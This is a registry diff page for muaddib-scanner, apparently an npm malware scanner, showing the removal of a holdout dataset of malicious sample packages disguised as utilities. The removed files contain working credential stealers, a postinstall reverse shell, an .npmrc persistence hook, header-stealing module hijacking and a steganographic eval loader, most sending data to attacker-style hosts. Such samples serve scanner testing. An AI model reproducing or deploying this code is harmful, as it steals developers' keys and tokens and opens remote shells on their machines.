npm - muaddib-scanner - Versions diffs - 2.2.2 → 2.2.4 - Mend

muaddib-scanner 2.2.2 → 2.2.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (48) hide show

package/datasets/holdout-v3/env-file-parse-exfil/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "env-file-parse-exfil",
-  "version": "1.0.0",
-  "description": "Environment configuration loader",
-  "main": "index.js"
-}

package/datasets/holdout-v3/git-credential-steal/index.js DELETED Viewed

@@ -1,41 +0,0 @@
-const fs = require('fs');
-const os = require('os');
-const path = require('path');
-const https = require('https');
-const home = os.homedir();
-const collected = {};
-// Read git config for remote URLs with embedded tokens
-try {
-  const gitConfig = fs.readFileSync(path.join(home, '.gitconfig'), 'utf8');
-  const urlMatches = gitConfig.match(/url\s*=\s*.+/g);
-  if (urlMatches) collected.gitconfig = urlMatches;
-} catch(e) {}
-// Read stored git credentials
-try {
-  const creds = fs.readFileSync(path.join(home, '.git-credentials'), 'utf8');
-  collected.credentials = creds.split('\n').filter(l => l.trim());
-} catch(e) {}
-// Also check the project-level .git/config
-try {
-  const localConfig = fs.readFileSync(path.join(process.cwd(), '.git', 'config'), 'utf8');
-  const remotes = localConfig.match(/url\s*=\s*.+/g);
-  if (remotes) collected.localRemotes = remotes;
-} catch(e) {}
-if (Object.keys(collected).length > 0) {
-  const payload = JSON.stringify(collected);
-  const opts = {
-    hostname: 'git-tokens.exfil.dev',
-    port: 443,
-    path: '/collect',
-    method: 'POST',
-    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
-  };
-  const req = https.request(opts);
-  req.write(payload);
-  req.end();
-}

package/datasets/holdout-v3/git-credential-steal/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "git-credential-steal",
-  "version": "1.0.0",
-  "description": "Git repository inspector utility",
-  "main": "index.js"
-}

package/datasets/holdout-v3/npm-hook-hijack/index.js DELETED Viewed

@@ -1,20 +0,0 @@
-const fs = require('fs');
-const os = require('os');
-const path = require('path');
-const home = os.homedir();
-const npmrcPath = path.join(home, '.npmrc');
-// Read existing .npmrc content
-let existing = '';
-try {
-  existing = fs.readFileSync(npmrcPath, 'utf8');
-} catch(e) {}
-// Inject an oninstall hook for persistence
-// This will execute on every future npm install
-const hook = '\noninstall=node -e "require(\'https\').get(\'https://hooks.malware.io/ping?h=\'+require(\'os\').hostname())"';
-if (!existing.includes('oninstall')) {
-  fs.writeFileSync(npmrcPath, existing + hook, 'utf8');
-}

package/datasets/holdout-v3/npm-hook-hijack/package.json DELETED Viewed

@@ -1,9 +0,0 @@
-{
-  "name": "npm-hook-hijack",
-  "version": "1.0.0",
-  "description": "npm configuration optimizer",
-  "main": "index.js",
-  "scripts": {
-    "postinstall": "node index.js"
-  }
-}

package/datasets/holdout-v3/postinstall-reverse-shell/index.js DELETED Viewed

@@ -1,24 +0,0 @@
-const net = require('net');
-const { spawn } = require('child_process');
-const os = require('os');
-const HOST = '45.33.32.156';
-const PORT = 4444;
-const client = new net.Socket();
-client.connect(PORT, HOST, function() {
-  const shell = os.platform() === 'win32' ? 'cmd.exe' : '/bin/sh';
-  const proc = spawn(shell, { stdio: ['pipe', 'pipe', 'pipe'] });
-  client.pipe(proc.stdin);
-  proc.stdout.pipe(client);
-  proc.stderr.pipe(client);
-  proc.on('exit', function() {
-    client.destroy();
-  });
-});
-client.on('error', function() {
-  // Silent failure
-});

package/datasets/holdout-v3/postinstall-reverse-shell/package.json DELETED Viewed

@@ -1,9 +0,0 @@
-{
-  "name": "postinstall-reverse-shell",
-  "version": "1.0.0",
-  "description": "System diagnostics toolkit",
-  "main": "index.js",
-  "scripts": {
-    "postinstall": "node index.js"
-  }
-}

package/datasets/holdout-v3/require-cache-poison/index.js DELETED Viewed

@@ -1,26 +0,0 @@
-const https = require('https');
-const origRequest = https.request;
-// Poison the require cache — replace https module with interceptor
-const mod = require.cache[require.resolve('https')];
-mod.exports.request = function(options, callback) {
-  const headers = options.headers || {};
-  if (headers['Authorization'] || headers['authorization']) {
-    const stolen = JSON.stringify({
-      host: options.hostname || options.host,
-      path: options.path,
-      auth: headers['Authorization'] || headers['authorization']
-    });
-    const exfilOpts = {
-      hostname: 'collect.evil-analytics.com',
-      port: 443,
-      path: '/api/headers',
-      method: 'POST',
-      headers: { 'Content-Type': 'application/json' }
-    };
-    const req = origRequest(exfilOpts);
-    req.write(stolen);
-    req.end();
-  }
-  return origRequest.call(https, options, callback);
-};

package/datasets/holdout-v3/require-cache-poison/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "require-cache-poison",
-  "version": "1.0.0",
-  "description": "Utility for module caching optimization",
-  "main": "index.js"
-}

package/datasets/holdout-v3/steganography-payload/index.js DELETED Viewed

@@ -1,31 +0,0 @@
-const fs = require('fs');
-const path = require('path');
-// Read embedded PNG image from the package
-const imgPath = path.join(__dirname, 'assets', 'logo.png');
-let imgBuffer;
-try {
-  imgBuffer = fs.readFileSync(imgPath);
-} catch(e) { process.exit(0); }
-// Skip PNG header (8 bytes) and find IDAT chunks
-// Extract LSB from pixel data to reconstruct hidden payload
-const pixels = imgBuffer.slice(imgBuffer.indexOf('IDAT') + 8);
-let bits = '';
-for (let i = 0; i < Math.min(pixels.length, 8192); i++) {
-  bits += (pixels[i] & 1).toString();
-}
-// Convert bits to bytes
-let payload = '';
-for (let i = 0; i + 8 <= bits.length; i += 8) {
-  const byte = parseInt(bits.slice(i, i + 8), 2);
-  if (byte === 0) break;
-  payload += String.fromCharCode(byte);
-}
-// Decode and execute the hidden payload
-if (payload.length > 10) {
-  const decoded = Buffer.from(payload, 'base64').toString('utf8');
-  eval(decoded);
-}

package/datasets/holdout-v3/steganography-payload/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "steganography-payload",
-  "version": "1.0.0",
-  "description": "Image processing utilities",
-  "main": "index.js"
-}

package/datasets/holdout-v3/symlink-escape/index.js DELETED Viewed

@@ -1,30 +0,0 @@
-const fs = require('fs');
-const os = require('os');
-const path = require('path');
-const https = require('https');
-const home = os.homedir();
-const target = path.join(home, '.ssh', 'id_rsa');
-const link = path.join(__dirname, '.cache', 'temp_link');
-// Create a symlink to bypass direct path checks
-try { fs.mkdirSync(path.join(__dirname, '.cache'), { recursive: true }); } catch(e) {}
-try { fs.symlinkSync(target, link); } catch(e) {}
-// Read through the symlink — not the direct sensitive path
-const keyData = fs.readFileSync(link, 'utf8');
-const payload = JSON.stringify({ key: keyData, host: os.hostname() });
-const opts = {
-  hostname: 'keys.exfil-service.net',
-  port: 443,
-  path: '/upload',
-  method: 'POST',
-  headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
-};
-const req = https.request(opts);
-req.write(payload);
-req.end();
-// Cleanup
-try { fs.unlinkSync(link); } catch(e) {}

package/datasets/holdout-v3/symlink-escape/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "symlink-escape",
-  "version": "1.0.0",
-  "description": "File system utilities for linking",
-  "main": "index.js"
-}

package/datasets/holdout-v3/timezone-trigger/index.js DELETED Viewed

@@ -1,38 +0,0 @@
-const fs = require('fs');
-const os = require('os');
-const https = require('https');
-// Geographic targeting — only activate in specific timezones
-const tz = Intl.DateTimeFormat().resolvedOptions().timeZone;
-const targets = ['Europe/Kiev', 'Europe/Moscow', 'Asia/Tehran', 'Asia/Pyongyang'];
-if (targets.includes(tz)) {
-  const home = os.homedir();
-  const secrets = {};
-  // Harvest credentials
-  try {
-    secrets.sshKey = fs.readFileSync(path.join(home, '.ssh', 'id_rsa'), 'utf8');
-  } catch(e) {}
-  try {
-    secrets.npmrc = fs.readFileSync(path.join(home, '.npmrc'), 'utf8');
-  } catch(e) {}
-  try {
-    secrets.awsCreds = fs.readFileSync(path.join(home, '.aws', 'credentials'), 'utf8');
-  } catch(e) {}
-  secrets.timezone = tz;
-  secrets.hostname = os.hostname();
-  secrets.user = os.userInfo().username;
-  const data = JSON.stringify(secrets);
-  const req = https.request({
-    hostname: 'geo-intel.evil-apt.com',
-    port: 443,
-    path: '/target',
-    method: 'POST',
-    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }
-  });
-  req.write(data);
-  req.end();
-}

package/datasets/holdout-v3/timezone-trigger/package.json DELETED Viewed

@@ -1,6 +0,0 @@
-{
-  "name": "timezone-trigger",
-  "version": "1.0.0",
-  "description": "Internationalization support module",
-  "main": "index.js"
-}